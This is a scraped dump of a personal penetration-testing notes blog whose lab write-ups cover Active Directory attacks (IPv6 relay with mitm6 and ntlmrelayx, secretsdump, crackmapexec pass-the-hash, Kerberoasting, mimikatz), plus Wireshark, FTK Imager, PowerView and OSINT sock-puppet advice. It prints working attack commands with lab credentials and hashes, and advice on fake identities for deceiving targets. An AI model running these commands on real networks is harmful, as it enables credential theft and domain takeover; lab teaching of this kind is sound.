When using Kerberos on a network, it supports mutual authentication, which allows two devices to validate the identity of each other.\nWhat is SSO: Single Sign-On (SSO) is an authentication method that allows users to log in to multiple applications with a single set of credentials, eliminating the need to remember multiple usernames and passwords. When a user logs in to an identity provider (IdP), the IdP issues an authentication token, which grants access to all linked applications (service providers) without requiring a separate login for each.\nWhat is delegated auth: Delegated authentication is a process where a user's login credentials are authenticated by a third-party identity provider (IdP) instead of the application they are trying to access. The application \u0026ldquo;delegates\u0026rdquo; the authentication task to another service, like an Active Directory or LDAP server, which verifies the user\u0026rsquo;s credentials and returns a token to grant access. This approach enhances security and user experience by leveraging existing credentials and potentially building on single sign-on (SSO) principles. source: GOOGLE\nWithin an AD environment there are 3 main elements when working with Kerberos:\n• Client: A domain user who logs in to a client computer to access a resource, such as a file server or application server\n• Key distribution center (KDC): This is the domain controller that is running Kerberos and Active Directory\n• Application server: This is usually a server on the domain that is hosting a service or resource\nKerberos authentication process: see the PDF file linked on this page.\nYou can follow this PDF for different Kerberoasting attacks also, not limited to the auth process of Kerberos.\nAbusing trust on IPv6 with AD: Verifying whether ADCS is installed or not:\n1. Check if the Windows roles are installed:\nGet-WindowsFeature -Name AD-Certificate,ADCS-Cert-Authority\nIf installed you will see a result like this:\n2. Check if the Certificate Authority service is running:\nGet-Service -Name CertSvc\nIf installed you should see a result like this:\n3. Check the Certificate Management console:\n- Open Server Manager\n- Tools \u0026gt; Certificate Authority\n- If configured it will show the certificate.\n4. Check if the LDAPS port is listening or not:\nTest-NetConnection -ComputerName localhost -Port 636\nNow if nothing is installed follow these steps: Enabling LDAPS on the domain controller \u0026gt; open PowerShell:\nInstall-WindowsFeature -Name AD-Certificate,ADCS-Cert-Authority -Restart\nNext, use the following command to set up the domain controller as the Enterprise Certification Authority and generate the digital certificate with a validity period of 99 years:\nInstall-AdcsCertificationAuthority -CAType EnterpriseRootCA -CACommonName \u0026#34;MARVEL-HYDRA-DC-CA\u0026#34; -KeyLength 2048 -HashAlgorithmName SHA256 -ValidityPeriod Years -ValidityPeriodUnits 99\nWhen you’re prompted to perform the “Install-AdcsCertificationAuthority” on target “DC1” operation, type A and hit Enter to proceed. After the completion of this process restart the machine:\nRestart-Computer -Force\nPerforming the attack: Open Kali Linux with 2 terminal tabs and run the 2 commands separately, one in each terminal:\n1. # first terminal\nimpacket-ntlmrelayx -6 -t ldaps://10.11.12.128 -wh wpad.MARVEL.local -l Desktop/mitm6-loot\nFor the LDAPS target we have provided the IP of the DOMAIN CONTROLLER.\n2. Now on the second terminal we will perform the mitm attack:\nsudo mitm6 -i eth1 -d MARVEL.local\nProvided the interface where my PUNISHER and DOMAIN CONTROLLER live.\n3. 
Now we need to make an event occur: reboot the PUNISHER machine and log in as DOMAIN ADMIN using the username MARVEL\\Administrator and the password given previously, P@$$w0rd!\n4. Then just wait; you will see a user being created along the way on the ntlmrelayx tab.\n5. Also a dump of the whole DOMAIN has been done inside the directory we provided for the loot. Let\u0026rsquo;s check that out: open the HTML files to see the data dump.\nImportant Remember, mitm6 has to intercept the IPv6 traffic on the network and Impacket has to capture and relay the NTLMv2 hashes across to the domain controller, then extract the objects from Active Directory; therefore, it may not always happen in real time.\nNote In a real-world scenario, the client computers on the network will automatically send a Domain Name System (DNS) message across the IPv6 network at various time intervals. Be patient and you will capture these messages and perform the relay attack. However, the mitm6 tool can create communication issues on the network and should not be running for long durations at a time. Running mitm6 or similar tools can disrupt normal network operations, degrade network performance, and potentially cause unintended denial-of-service (DoS) conditions. Such actions could have serious implications for network reliability and security.\nTaking over the domain: Next, let’s use secretsdump to extract the contents of the New Technology Directory Services Directory (NTDS.DIT) file within the domain controller:\nimpacket-secretsdump MARVEL.local/cliZIWbKiD:\u0026#39;ZS:jAYV2y}#e07I\u0026#39;@10.11.12.128 -just-dc-ntlm\nWe’re able to perform a technique known as OS credential dumping: NTDS by extracting sensitive information from the NTDS.dit such as domain usernames, device accounts, and password hashes.\n2. 
Lastly, log in to the domain controller using the Administrator account, then open Server Manager | Tools | Active Directory Users and Computers and you will see that the new user account exists: ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/11-advanced-ad-attacks/00-understanding-kerberos/","summary":"\u003cp\u003eKerberos is a network authentication protocol that runs on Windows Server, which enables clients to authenticate on the network and access services within the Windows domain. Kerberos provides single sign-on (SSO), which allows a user to authenticate once on a network and access resources without having to re-enter their user credentials each time they need to access a new resource, such as a mapped network drive. Kerberos supports delegated authentication, which allows a service running on a client’s computer to act on behalf of the authenticated domain user when it connects to other services on the network. Kerberos supports interoperability, which allows a Windows-based operating system to work in other networks that also use Kerberos as their authentication mechanism. When using Kerberos on a network, it supports mutual authentication, which allows two devices to validate the identity of each other.\u003c/p\u003e","title":"Understanding Kerberos"},{"content":"What is ftk imager? FTK Imager is a free, forensic tool used to create a bit-by-bit copy, or \u0026ldquo;image,\u0026rdquo; of a storage device to preserve it as evidence without altering the original data. It is used by digital investigators to collect and analyze electronic evidence from various sources like hard drives, mobile devices, and removable media. 
A key feature is its ability to perform integrity checks using hashing algorithms to ensure the forensic image is an accurate and authentic copy, which is crucial for legal admissibility.\nReal-World Applications of FTK Imager: FTK Imager finds extensive use in various domains within digital forensics:\n1. Digital Crime Investigations: FTK Imager assists in collecting evidence for criminal cases, helping investigators build strong cases based on accurate and comprehensive forensic images. 2. Incident Response: During incident response activities, FTK Imager aids in analyzing compromised systems, identifying potential threats, and providing valuable insights into the nature of the incident. 3. E-Discovery: FTK Imager plays a crucial role in e-discovery, allowing for the extraction and analysis of electronic data for legal purposes. This enables organizations to comply with legal requirements and uncover relevant evidence. 4. Data Recovery: In cases involving data loss or deletion, FTK Imager helps retrieve lost or deleted files, providing investigators with critical information for their examinations. Practical Demo: partition creation -\u0026gt; Transferring any file into that partition -\u0026gt; removing it -\u0026gt; creating an image of that partition -\u0026gt; opening it through ftk imager again and seeing if we can see the deleted data or not.\nCreating a separate partition for the practical: Open file manager -\u0026gt; click on This pc -\u0026gt; You may have multiple partition / may not. 
Now click on the Windows button, search for Disk Management, and open it. You should see your primary partition; right-click on it, then select the option Shrink Volume. We only need 1 GB for the partition; to do so, write 1024 into this column and then click on Shrink. There should be a new unallocated volume created. Again right-click on that newly created volume and select the option New Simple Volume. A wizard like this will pop up; click on Next, select the default options, and give it a name accordingly (I have given the name FTK), then click on Finish. The new partition will appear. Installing FTK Imager: Search for FTK Imager download, come to the following website and click on Free Download. Install the application first on your own. Now let\u0026rsquo;s start the actual practical: Select any image of your choice from any folder, then copy and paste that image into the newly created partition you just made for the practical. After pasting, delete it immediately. Now open the FTK Imager application -\u0026gt; Click on File and select the option Create Disk Image. Then select Logical Drive -\u0026gt; then select the drive you want to make an image of; another wizard will pop up after finishing the previous step, so click on the Add option. Then select the option E01, then give a basic description as you need. 
Then select a destination folder to store the image file. After that click on Start. The image will be created. Go to the destination location; we can see two files there: the first one is a text doc, which provides basic info about the case; the second one is the actual image, the E01 file.\nKEY FEATURES OF THE E01 FILE:\nWhen you create the .E01 file, you are embedding several critical pieces of data directly into the file itself.\nCase Metadata (The Label): At the start of the process, FTK Imager asks you for \u0026ldquo;Evidence Item Information.\u0026rdquo;\nThis includes Case Number, Examiner Name, Notes, Evidence Number, etc.\nAll this information is written into the .E01 file\u0026rsquo;s header. This is a core part of the Chain of Custody—it proves who collected the evidence, when, and why.\nBuilt-in Verification (The Tamper-Proof Seal): This is the most important feature.\nThe .E01 format saves MD5 and/or SHA1 hashes for the entire evidence source.\nWhen you \u0026ldquo;verify\u0026rdquo; the image (or when another tool opens it), it re-calculates the hash of the data and compares it to the original hash stored in the file.\nIf they match: You can state in court that your forensic copy is a perfect, unaltered duplicate of the original drive.\nIf they don\u0026rsquo;t match: The evidence is considered \u0026ldquo;tampered\u0026rdquo; or \u0026ldquo;corrupted.\u0026rdquo;\nCompression (To Save Space): The raw data inside the .E01 container is compressed.\nThis is why your 500 GB drive might result in a 200 GB .E01 file. It intelligently skips empty space and compresses the rest.\nFile Segmentation (Chunking): The E01 format automatically splits the image into smaller, manageable \u0026ldquo;chunks.\u0026rdquo;\nYou will see files like image.E01, image.E02, image.E03, etc.\nThis was originally done because many file systems (like FAT32) couldn\u0026rsquo;t handle single files larger than 4 GB. 
This standard just continued.\nThe .E01 file is the \u0026ldquo;main\u0026rdquo; file that holds the headers, metadata, and the first chunk of data.\nImage analysis: Come to ftk imager app -\u0026gt; select add evidence item -\u0026gt; this time use the option image file select the image file from the source location: On finishing the step and evidence tree will appear on the left pane. Click through the tree until you find the option Recycle Bin And we can see the image file we previously deleted. ","permalink":"https://0x-s0M3n4th.github.io/notes/miscellaneous/int-250/ftk-imager/","summary":"\u003ch1 id=\"what-is-ftk-imager\"\u003eWhat is ftk imager?\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eFTK Imager\u003c/strong\u003e is a free, forensic tool used to create a bit-by-bit copy, or \u0026ldquo;image,\u0026rdquo; of a storage device to preserve it as evidence without altering the original data. It is used by digital investigators to collect and analyze electronic evidence from various sources like hard drives, mobile devices, and removable media. A key feature is its ability to perform integrity checks using hashing algorithms to ensure the forensic image is an accurate and authentic copy, which is crucial for legal admissibility.\u003c/p\u003e","title":"Practical Demo: Creating a Forensic Image with FTK Imager"},{"content":" Wireshark: Packets: In a real world blue team operation usually the threat analysts are given with \u0026lsquo;PCAP\u0026rsquo; files to analyze which systems are getting affected by the malware / what is the C2 server of the attacker/ where did the malware spread from which time, what\u0026rsquo;s the IP of those infected systems etc. . .\nWhat are PCAP files? -\u0026gt; PCAP file is a exported format of the captured data from Layer 2-7 of the OSI model by wireshark. 
We can share that captured data with anyone to analyze what happened within this timeframe in the network.\nPractical DEMO: Download the PCAP file from this page: PCAP_FILE\nOpen up Wireshark -\u0026gt; sudo wireshark\nDisplay filters:\n• Filtering HTTP requests -\u0026gt; http.request\n• Source IP filtering -\u0026gt; ip.src==IP_ADDR\n• HTTP, DNS, FTP, ICMP filters -\u0026gt; http , ftp , dns , icmp\n• ip.addr == IP_ADDR \u0026amp;\u0026amp; http.request.method == \u0026quot;POST/GET\u0026quot;\n• http.host ==\u0026quot;HOST_NAME\u0026quot;\n• eth.addr==MAC_ADDR\n• We can filter out services using port numbers also -\u0026gt; tcp.port==80/21/22/23/25/3306/445/139\nAnalyzing a PCAP file of infections regarding the \u0026lsquo;dridex\u0026rsquo; malware -\u0026gt; tls.handshake.type eq 1\nRight-click on TLSv1.2 -\u0026gt; Follow -\u0026gt; TCP stream -\u0026gt; Everything is encrypted here.\nFilter used to identify the connections made from the client to execute the actual DLL -\u0026gt; (http.request or tls.handshake.type eq 1) and !(ssdp)\nWe have the TLS keys to decrypt them. Identified the actual DLL file -\u0026gt; We will export this file as an object and then upload it on VirusTotal -\u0026gt; Importing system32 files: Identified the C2 server -\u0026gt; After executing the malware the client is actually getting connected to the C2 server of the attacker. 
Device identification using nbns {NetBios Name Service} -\u0026gt; ","permalink":"https://0x-s0M3n4th.github.io/notes/blue-team-ops/00-wireshark/intro-to-wireshark/","summary":"\u003col\u003e\n\u003cli\u003e\n\u003cp\u003eWireshark: \u003cimg alt=\"Wireshark-intro\" loading=\"lazy\" src=\"/images/WIRESHARK_TUT/Wireshark-intro.png\"\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003ePackets: \u003cimg alt=\"Packets\" loading=\"lazy\" src=\"/images/WIRESHARK_TUT/Packets.png\"\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eIn a real world blue team operation usually the threat analysts are given with \u0026lsquo;PCAP\u0026rsquo; files to analyze which systems are getting affected by the malware / what is the C2 server of the attacker/ where did the malware spread from which time, what\u0026rsquo;s the IP of those infected systems etc. . .\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cem\u003eWhat are PCAP files?\u003c/em\u003e -\u0026gt; PCAP file is a exported format of the captured data from Layer 2-7 of the OSI model by wireshark. We can share that captured data to anyone to analyze what happened within this timeframe in the network.\u003c/p\u003e","title":"Practical Wireshark"},{"content":"Welcome. If you\u0026rsquo;re here, you\u0026rsquo;re likely passionate about red teaming and the art of the technical write-up. This blog is my contribution to that community. I appreciate you taking the time to be here.\nWhat You’ll Find Here\nRed Teaming Notes\nI share real-world notes and tactics I’ve picked up through learning, labs, and exercises. 
Think of it as my personal “Field Manual” — from privilege escalation to lateral movement and beyond.\nMy own stuff that I will be learning constantly\nI will be sharing what I am learning on my journey to help people on different topics.\nLab Setups \u0026amp; Exploitations\nI build offensive labs from scratch — Active Directory setups, misconfigurations, pivoting environments — and walk through my exploitations with real tooling and thought process.\nMy Journey\nI also log my personal growth: certifications I pursue, challenges I overcome, and what I learn along the way — raw and unfiltered.\nWho Is This For?\nIf you are a hardcore learner, it\u0026rsquo;s definitely for you.\nThis blog is designed to share, teach, and grow together.\nOngoing Work\nThis site is a live project. I update as I learn — so expect new posts, refined notes, and more lab walkthroughs on a weekly basis. I am not the best; I follow many folks to get a ton of knowledge and guidance.\nFeel free to browse through the Blogs, check out my Notes, or dive into Tags to filter by topics of interest.\nHave a great time here!\n","permalink":"https://0x-s0M3n4th.github.io/blogs/welcome/","title":"Hello Friend"},{"content":"We will perform various lateral movement and vertical movement techniques. 
Vertical movement allows a penetration tester to escalate their privileges within a network, as compared to lateral movement, which focuses on using the same user privileges across multiple systems on the network.\nLateral movement with crackmapexec: Power on kali, THEPUNISHER, Windows server 2022 . We will perform a pass-the-password attack using the password of the user fcastle across the entire domain. Make sure you have installed crackmapexec on your kali. Use the following command: crackmapexec smb 10.11.12.0/24 -u fcastle -d MARVEL.local -p Password1 crackmapexec performs SMB enumeration on the targeted network using the creds. Then it shows the Pwn3d! marker for each machine on which the username and password grant administrative access. 2. Retrieving the SAM database from the windows devices across the domain using the following command:\ncrackmapexec smb 10.11.12.0/24 -u fcastle -d MARVEL.local -p Password1 --sam The local usernames and NTLMV1 hashes have been retrieved from the client machine. These hashes can be used in a pass-the-hash (PTH) attack across the network for lateral movement and privesc on other devices. 3. Performing the pass-the-password attack again, but with the --local-auth flag and the credentials of a local admin account; as this is a local account, we drop the -d flag, which is for domain users/admins:\ncrackmapexec smb 10.11.12.0/24 -u Administrator -p Password1! --local-auth 4. Performing a PTH attack with the hash of the local Administrator account, which we retrieved with the previous --sam command:\ncrackmapexec smb 172.30.1.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth # Pass the hash 5. 
Since the fcastle account has certain admin privileges, we can try to dump the LSA secrets across the domain devices using the following command:\ncrackmapexec smb 10.11.12.0/24 -u fcastle -d MARVEL.local -p Password1 --lsa Vertical movement using kerberos Important For this attack to work, the time on Kali Linux needs to be in sync with the time on the targeted domain controller. If not, the following message will appear: \u0026quot;Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)\u0026quot;. We will solve this issue during this practical exercise.\nOpen kali and install ntpdate using the following command: sudo apt install ntpsec-ntpdate Next, synchronize the time with the targeted domain controller: sudo ntpdate 10.11.12.128 Retrieve the Kerberos TGS ticket hash from the domain controller by authenticating to it with a valid domain user credential: impacket-GetUserSPNs MARVEL.local/fcastle:Password1 -dc-ip 10.11.12.128 -request Note An SPN is a unique identifier for a service instance. SPNs are used in Kerberos authentication to associate a service instance with a service logon account, allowing clients to securely request access to services running on servers.\nSAVE THE TGS HASH INTO A FILE 4. Determine the hashcat mode for cracking Kerberos 5 etype 23 hashes. We are going to use mode 13100 for cracking the TGS hash with hashcat; to look it up:\nhashcat -h | grep TGS 5. Command for cracking:\nhashcat -m 13100 TGS.txt /usr/share/wordlists/rockyou.txt -O 6. Results: hash cracked, and the password is MYpassword123# Lateral movement using mimikatz: Open kali linux, then head over to this path /usr/share/windows-resources/mimikatz/x64 . Start a Python web server on the same network as the domain controller. Log in to the domain controller as the SQLService account we attacked during the TGS hash cracking. Use those credentials along with the username MARVEL\\SQLService . 
Then open PowerShell as administrator and follow the commands for downloading those files: Invoke-WebRequest -uri http://kali_ip:8000/mimikatz.exe -OutFile mimikatz.exe # Download the 4 files the same way You can get remote access using evil-winrm and xfreerdp from kali itself using the following commands:\nxfreerdp /v:10.11.12.128 /u:SQLService /p:\u0026#39;MYpassword123#\u0026#39; /d:MARVEL.local # If you have the hash use \u0026#39;/pth:{hash}\u0026#39; instead of \u0026#39;/p\u0026#39; # Syntax: evil-winrm -i IP -u Username -H Hash evil-winrm -i 10.11.12.128 -u SQLService -p \u0026#39;MYpassword123#\u0026#39; To run mimikatz.exe either double click the file downloaded into the Downloads folder, or use the same CLI and type .\\mimikatz.exe Check mimikatz privileges using the following command: privilege::debug The screenshot shows Mimikatz has the necessary privileges to extract the passwords and hashes.\nGrabbing credentials using mimikatz: Extract all the user accounts and their password hashes by using the following command: sekurlsa::logonpasswords Mimikatz is able to retrieve all the user details that were stored within the memory of the host device since the last time it was rebooted. 2. To extract the LSA data from the memory of the domain controller, use the following command:\nlsadump::lsa /patch 3. By obtaining the NTLMv1 hashes of each user, you can perform lateral movement throughout the network using the PTH technique and even perform password cracking using hashcat.\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/11-advanced-ad-attacks/01-attacking-active-directory/","title":"Attacking Active Directory"},{"content":" Passive information gathering is when you use an indirect approach to obtain information about your target. This method obtains the information that\u0026rsquo;s publicly available from many sources, thus eliminating direct contact with the potential target. 
OSINT Gathering information before exploiting and gaining access to a network or system will help the penetration tester narrow the scope of the attack and focus on the security vulnerabilities of the target. This means the penetration tester can design specific types of attacks, exploits, and payloads that are suitable for the attack surface of the target. We will begin our information-gathering phase by utilizing the largest computer network in existence: the internet.\nMostly we will be using tools like Osintgram and Sherlock, or we can utilize the internet itself. OSINT techniques: Sock puppet: A sock puppet is a piece of terminology that\u0026rsquo;s used within the cybersecurity industry, especially among penetration testers. A sock puppet is simply a misrepresentation of an individual, such as creating an entire fake identity. While pretending to be someone else is unlawful, hackers always create a fake identity on the internet when gathering information about their targets. By creating a misrepresentation of a person on an online platform such as a social media website, no one knows the true identity of the account owner. Therefore, the hacker can pretend to be an employee or a mutual friend of their target to gather data about the organization.\nAnother key aspect of using a sock puppet is to ensure the target does not know who is performing OSINT. This is also a good practice for penetration testers to remain stealthy. 
One of the best ways to avoid being tracked is to use a VPN service.\nCreating fake identity guide: • Creating a fake identity: https://www.fakenamegenerator.com/ • Fake profile picture: https://www.thispersondoesnotexist.com/ • Using a proxy credit card: https://privacy.com/\nTip Remember: whenever you craft usernames, mail accounts or anything else for OSINT on a person, first learn about their personal life, where they work, etc., and create fake identities accordingly, not just randomly.\nWe can also make use of AI for random name generation as well as image generation: Anonymizing traffic: The following are common techniques that are used by penetration testers to anonymize their traffic:\nVirtual Private Network (VPN) Proxychains The Onion Router (TOR) Tips to choose which VPN service to use: • Using a VPN service provider will require a paid subscription. • Ensure the VPN service provider does not keep logs or sell user data to third parties. • Ensure the VPN service provider provides unmetered bandwidth for users. • Ensure the VPN service provider supports integrating the VPN client application on your operating system. • You can use various cloud service providers such as Azure and AWS to set up your VPN servers on the cloud. • Ensure your Domain Name System (DNS) traffic is not leaking as it will reveal your geolocation data. Use a site such as DNS Leak Test (www.dnsleaktest.com) to check this. 
• If your VPN service does not support IPv6, ensure you disable IPv6 on your attacker machine.\nI prefer Mullvad VPN.\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/02-reconnaissance/01-deep-passive-recon/","title":"Deep Passive Recon"},{"content":" Power on your 4 machines : THE PUNISHER, THESPIDERMAN, WIN_2K22, KALI LINUX Then make sure your THEPUNISHER machine can identify the local network; in my case it\u0026rsquo;s MARVEL.local Creating an Antivirus GPO on windows server 2022 (I made this inside win 2019 previously). Use the following commands inside any of your windows servers: PS C:\\Users\\Administrator\u0026gt; New-GPO -Name \u0026#34;DisableAVGPO\u0026#34; | New-GPLink -Target \u0026#34;DC=MARVEL,DC=local\u0026#34; 4. 
Next, use the following commands to link the DisableAVGPO policy on the MARVEL.local domain:\nPS C:\\Users\\Administrator\u0026gt; Set-GPLink -Name \u0026#34;DisableAVGPO\u0026#34; -Target \u0026#34;DC=MARVEL,DC=local\u0026#34; -Enforced Yes Working with powerview: PowerView is a powerful PowerShell tool that allows penetration testers to gain in-depth insights into an organization’s Active Directory domain and forest structure. The PowerView tool uses native PowerShell coding (with some modifications) to work better with Active Directory and a Win32 Application Programming Interface (API). This allows PowerView to interact with Active Directory seamlessly. Using PowerView will dramatically improve the process of performing enumeration within Active Directory.\nNote Keep in mind that with the continuous advancement of antimalware and threat detection solutions, Windows Defender may prevent and stop many of these penetration testing tools from being used on a Windows operating system as they are also used by threat actors. Various techniques and strategies can be used to evade detection during a penetration test, but this is beyond the scope of this book. Therefore, in a real-world penetration test, ask the customer for a dedicated domain-joined system with remote access and to permit PowerView.ps1, mimikatz.exe, PsExec64.exe, PSLoggedOn.exe, and any other Windows-based tools for penetration testing on their antimalware solution on the device. You can then use your attacker machine to remotely connect to the domain-joined machine, transfer your tools, and perform the penetration test.\nPower on THEPUNISHER, Windows Server 2022 and kali linux. Open kali, locate the powerview.ps1 file and transfer it through a python web server. Then allow incoming connections to port 8000 on your kali using the following commands: sudo ufw status sudo ufw allow 8000 4. 
Download the script from THEPUNISHER machine using the following command:\niwr -uri http://kali_ip:8000/powerview.ps1 -OutFile Powerview.ps1 5. Disable powershell execution policy using the following command:\npowershell -ExecutionPolicy bypass # executing powerview . .\\Powerview.ps1 To retrieve information about your current domain, use the following command: Get-NetDomain Important To retrieve information about another domain within the forest, use the Get-NetDomain -Domain \u0026lt;domain-name\u0026gt; command.\nTo retrieve the Security Identifier (SID) of the current domain, use the following command: Get-DomainSID Note Additionally, using the whoami /user command provides you with the domain, username, and SID.\nObtaining a list of domain controllers using the command Get-NetDomainController Note To retrieve the identity of the domain controller within another domain of the same forest, use the Get-NetDomainController -Domain \u0026lt;domain-name\u0026gt; command.\nTo retrieve information about domain policies, use the command Get-DomainPolicy To retrieve a list of all the users on the current domain: Get-NetUser 11. Furthermore, you can view the group memberships of a specific user, as well as their last login and log-off times. 12. Retrieving a list of all domain controllers on the current domain:\nGet-NetComputer 13. Retrieving list of all the groups within current domain:\nGet-NetGroup Important To filter for a specific group, use the Get-NetGroup *keyword* command. For example, Get-NetGroup *admin* will retrieve all the groups that contain the admin keyword.\nTo retrieve all the local groups on a system on the domain, use the following command: Get-NetLocalGroup -ComputerName THEPUNISHER.MARVEL.local 15. To retrieve all the file shares on all the devices within the current domain, use the following command:\nInvoke-ShareFinder -Verbose 16. Retrieving the list of all the GPOs in the current domain:\nGet-NetGPO 17. 
To get specific details about the current forest:\nGet-NetForest 18. To retrieve all the domains within the current forest, as well as all the global catalogs for the current forest that contain information about all objects within the directory, use the following commands:\nGet-NetForestDomain Get-NetForestCatalog 19. To discover all the devices where the current user has local administrator access on the current domain, use the following command:\nFind-LocalAdminAccess -Verbose I don\u0026rsquo;t have any local admin access on any of the workstations/DC, which is why it\u0026rsquo;s showing none.\nEXTRAS:\nCommand 1,2: ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) # second command: whoami /groups This command is a one-liner to check if your current user is a member of the local Administrators group. COMMAND BREAKDOWN: It will return either True or False [Security.Principal.WindowsIdentity]::GetCurrent() This gets your current user\u0026rsquo;s \u0026ldquo;identity.\u0026rdquo; Think of it as grabbing your digital ID card, which lists who you are (e.g., MARVEL\\fcastle) and what groups you belong to. [Security.Principal.WindowsPrincipal] (...) This takes the \u0026ldquo;identity\u0026rdquo; (your ID card) from step 1 and creates a \u0026ldquo;principal\u0026rdquo; object. A principal is an object that represents the security context of the user, allowing you to ask questions about what that user is allowed to do. .IsInRole( ... ) This is a method (a function) of the principal object. You are asking it the question, \u0026ldquo;Is this user in the following role?\u0026rdquo; [Security.Principal.WindowsBuiltInRole]::Administrator This is the specific role you are checking for. 
Instead of using a name like \u0026ldquo;Administrators\u0026rdquo; (which could change based on the system language), this uses a built-in, language-independent ID (S-1-5-32-544) that always means the local Administrators group. Command 3: This command lists all the users and groups that are members of the local \u0026ldquo;Administrators\u0026rdquo; group on your current machine. It\u0026rsquo;s the PowerView equivalent of the net localgroup administrators command you ran successfully.\nAnother way to bypass execution policy inside powershell for scripts: ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/10-active-directory-attacks/01-enumerating-active-directory/","title":"Enumerating Active Directory"},{"content":"DNSMap DNSmap works a bit differently from the tools we looked at in the previous sections. DNSmap attempts to enumerate the subdomains of an organization\u0026rsquo;s domain name by querying a built-in wordlist on Kali Linux. Once a subdomain has been found, DNSmap will also attempt to resolve the IP address automatically. 
sublist3r You can leverage the power of search engines for discovering sub-domains by using the Sublist3r tool. Sublist3r is a Python-based tool that is used to enumerate (extract/obtain) the subdomains of a given website using OSINT, such as search engines and other internet indexing platforms.\nInstall sublist3r sudo apt update sudo apt install sublist3r Running sublist3r sublist3r -d microsoft.com Use this command to save the results into a file, or you can simply do this: sublist3r -d target_domain 2\u0026gt;/dev/null \u0026gt; subdomains.txt 2\u0026gt;/dev/null sends all the errors produced by the command to /dev/null, which is a black hole in linux, while \u0026gt; writes the results into a file. 5. Edit the txt file, and adjust the first 4 entries: remove the comma and then separate the two subdomains like this\nmicrosoft.com anotherdomain.com Sub-domain discovery using knockpy: Knockpy is a Python-based tool that is used to enumerate (extract/obtain) the sub-domains of a targeted public domain using OSINT techniques and data sources, such as search engines and other internet indexing platforms.\nInstallation: sudo apt update \u0026amp;\u0026amp; sudo apt install -y knockpy 2. USAGE:\nknockpy --recon --dns 8.8.8.8 -d microsoft.com Note The --recon option specifies to perform sub-domain enumeration, the --dns option enables you to specify a custom DNS server to query, and -d specifies the targeted domain.\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/04-active-information-gathering/01-enumerating-subdomains/","title":"Enumerating Subdomains"},{"content":"pth-winexe: pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:58f5081696f366cdc72491a2c4996bd5 //192.168.83.136 cmd Impacket-psexec: impacket-psexec Administrator@192.168.83.136 -hashes aad3b435b51404eeaad3b435b51404ee:58f5081696f366cdc72491a2c4996bd5 xfreerdp: xfreerdp3 /u:Administrator /pth:58f5081696f366cdc72491a2c4996bd5 /v:192.168.83.136 This will give GUI access to the target.\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/08-post-exploitation-techniques/01-gaining-a-shell-with-pth-winexe-impacketxfreerdp/","title":"Gaining a Shell Using pth-winexe, Impacket \u0026 xfreerdp"},{"content":" OpenSSH is the open-source version of the Secure Shell (SSH) tools used by administrators of Linux and other non-Windows systems for cross-platform management of remote systems. Beginning with Windows 10 build 1809 and Windows Server 2019, OpenSSH is available as a feature on demand. 
OpenSSH for Windows has the following commands built in: ssh is the SSH client component that runs on the user\u0026rsquo;s local system sshd is the SSH server component that must be running on the system being managed remotely ssh-keygen generates, manages and converts authentication keys for SSH ssh-agent stores private keys used for public key authentication ssh-add adds private keys to the list allowed by the server ssh-keyscan aids in collecting the public SSH host keys from hosts sftp is the service that provides the Secure File Transfer Protocol, and runs over SSH scp is a file copy utility that runs on SSH Prerequisites check: To validate your environment, open an elevated PowerShell session and do the following:\nEnter winver.exe and press enter to see the version details for your Windows device. Run $PSVersionTable.PSVersion. Verify your major version is at least 5, and your minor version at least 1. Learn more about installing PowerShell on Windows. To check whether you\u0026rsquo;re an administrator, run the following command. The output shows True when you\u0026rsquo;re a member of the built-in Administrators group. (New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) Installing OpenSSH server: Open windows server 2019 and run powershell as administrator. Checking availability of OpenSSH: Get-WindowsCapability -Online | Where-Object Name -like \u0026#39;OpenSSH*\u0026#39; 3. Installing OpenSSH server:\nAdd-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0 4. To start and configure OpenSSH Server for initial use, open an elevated PowerShell prompt (right-click, then select Run as an administrator), then run the following commands to start the sshd service:\n# Start the sshd service Start-Service sshd # OPTIONAL but recommended: Set-Service -Name sshd -StartupType \u0026#39;Automatic\u0026#39; # Confirm the Firewall rule is configured. 
It should be created automatically by setup. Run the following to verify if (!(Get-NetFirewallRule -Name \u0026#34;OpenSSH-Server-In-TCP\u0026#34; -ErrorAction SilentlyContinue)) { Write-Output \u0026#34;Firewall Rule \u0026#39;OpenSSH-Server-In-TCP\u0026#39; does not exist, creating it...\u0026#34; New-NetFirewallRule -Name \u0026#39;OpenSSH-Server-In-TCP\u0026#39; -DisplayName \u0026#39;OpenSSH Server (sshd)\u0026#39; -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22 } else { Write-Output \u0026#34;Firewall rule \u0026#39;OpenSSH-Server-In-TCP\u0026#39; has been created and exists.\u0026#34; } Openssh server misconfigs: We need to confirm that password authentication is enabled: notepad C:\\ProgramData\\ssh\\sshd_config Look for the line #PasswordAuthentication yes. Remove the # at the beginning to uncomment it. If the line says PasswordAuthentication no, change it to yes. Restart the sshd service Restart-Service sshd Creating a vulnerable user: In the same PowerShell or a Command Prompt (as Administrator), run the following command. We\u0026rsquo;ll create a user named victim with the password Password123. 
